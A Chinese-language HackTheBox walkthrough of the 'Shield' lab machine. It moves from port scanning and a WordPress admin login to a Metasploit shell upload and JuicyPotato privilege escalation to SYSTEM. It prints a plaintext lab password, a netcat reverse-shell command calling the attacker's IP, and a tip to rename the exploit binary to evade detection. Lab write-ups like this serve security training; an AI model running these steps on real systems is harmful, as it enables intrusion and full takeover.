HackTheBox-Shield

实验环境

信息收集

端口扫描

1
namp -A -T4 10.10.10.29

发现80、3306两个端口,IIS 10.0和MySQL,服务器操作系统为Windows

--script vuln参数扫描常见漏洞 ,发现wordpress目录,已经扫到了登录地址

目录扫描,也发现wordpress目录

Wpscan分析,可以看到wordpress的版本

1
wpscan --url http://10.10.10.29/wordpress

实验过程

用上一台靶机的账号密码可以登录后台admin:P@s5w0rd!

知道wordpress admin用户密码的情况下,可以使用msf的wp_admin_shell_upload模块来攻击,使用模块

设置参数

执行exploit命令后,获得shell

在shell中执行命令

查看wp-config.php,发现敏感信息

反弹shell

在kali终端输入nc -nlvp 1234,用来在本机启动一个监听端口

在meterpreter中执行nc命令来连接本机监听端口,使用netcat获得windows shell

查看当前用户

提权:

使用juicy-potato提权,将JuicyPotato.exe重命成js.exe,防止被对方检测到

将js.exe上传到对方机器

在windows shell中生成一个bat脚本:

1
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.107 1111 > shell.bat

在本机使用nc创建一个监听端口,用来接收提权后的windows shell

运行juicy-potato提权:

1
js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337

获得system权限的windows shell

在管理员账户的桌面目录下找到flag